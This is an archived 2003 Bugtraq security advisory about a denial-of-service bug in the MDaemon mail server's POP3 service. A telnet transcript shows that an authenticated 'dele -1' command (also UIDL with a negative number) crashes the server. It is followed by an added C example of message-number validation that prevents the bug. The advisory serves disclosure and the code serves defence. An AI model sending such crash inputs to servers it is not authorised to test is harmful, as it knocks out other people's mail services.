MDaemon SMTP/POP/IMAP server: =>6.0.7: POP remote DoS






----- Original Message ----- 
From: "D4rkGr3y" <grey_1999@mail.ru>
To: <bugtraq@security.nnov.ru>; <bugtraq@securityfocus.com>
Sent: Saturday, April 26, 2003 7:11 PM
Subject: MDaemon SMTP/POP/IMAP server: =>6.0.7: POP remote DoS


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> ########################################################*
> #       Damage Hacking Group security advisory
> #                   www.dhgroup.org
> ########################################################*
> #Product: MDaemon SMTP/POP/IMAP server =>v.6.0.7
> #Authors: Alt-N Technologies [www.mdaemon.com]
> #Vulnerability: remote DoS via POP3 service
> ########################################################*
> 
> #Overview#-----------------------------------------------------#
> - From help-file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs
> of any number of individual users and comes complete with a powerful
> set of integrated tools for managing mail accounts and message
> formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
> 
> #Problem#------------------------------------------------------#
> 
> >telnet 127.0.0.1 110
> 
> +OK dark POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200303080224.AA2418601MD5635@dark>
> user dark
> +OK dark... Recipient ok
> pass ******
> +OK dark@dark's mailbox has 13 total messages (2274775 octets).
> dele -1
> 
> Connection to host lost.
> 
> ...and MDaemon has crashed. This bug (with negative numbers) is
> found in the UIDL and DELE commands and it could be used by authorized
> users only.
> 
> #Exploit#------------------------------------------------------#
> 
> \* use telnet ;P *\
> 
> 
> Best regards               www.dhgroup.org
>   D4rkGr3y                    icq 540981
> 
> 
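The advisory does not say why the server fails on a negative argument to DELE or UIDL. The block below is an added example, not code from the advisory or from Alt-N, of the strict message-number validation a POP3 server can apply before any mailbox lookup; RFC 1939 message numbers are decimal and start at 1. The struct, enum and function names are hypothetical, and the 13-message session is constructed to match the transcript above.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical per-session maildrop state (names are illustrative). */
struct maildrop {
    size_t count;                 /* messages present at login */
    const unsigned char *deleted; /* deleted[i] != 0: message i+1 is marked deleted */
};

enum msg_status { MSG_OK, MSG_SYNTAX, MSG_NO_SUCH, MSG_DELETED };

/*
 * Validate the argument of a DELE/UIDL-style command. Only digits are
 * accepted, so a sign, whitespace or trailing bytes are rejected as syntax
 * errors and never reach the index. On MSG_OK, *index is the zero-based slot.
 */
enum msg_status parse_msg_number(const char *arg, const struct maildrop *md,
                                 size_t *index)
{
    if (arg == NULL || *arg == '\0')
        return MSG_SYNTAX;
    for (const char *p = arg; *p != '\0'; p++)
        if (*p < '0' || *p > '9')       /* rejects "-1", "+1", " 1", "1x" */
            return MSG_SYNTAX;

    errno = 0;
    unsigned long long n = strtoull(arg, NULL, 10);
    if (errno == ERANGE)                /* digit string too large to represent */
        return MSG_NO_SUCH;
    if (n == 0 || n > md->count)        /* valid numbers are 1..count */
        return MSG_NO_SUCH;

    size_t i = (size_t)(n - 1);
    if (md->deleted[i])                 /* deleted messages cannot be referenced */
        return MSG_DELETED;
    *index = i;
    return MSG_OK;
}

int main(void)
{
    /* Constructed session: 13 messages, message 5 already marked deleted. */
    unsigned char del[13] = {0};
    struct maildrop md = { 13, del };
    size_t idx = 0;
    del[4] = 1;
    return parse_msg_number("-1", &md, &idx) == MSG_SYNTAX ? 0 : 1;
}
```

A server using such a check would answer every status other than `MSG_OK` with an `-ERR` reply and keep the session open.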

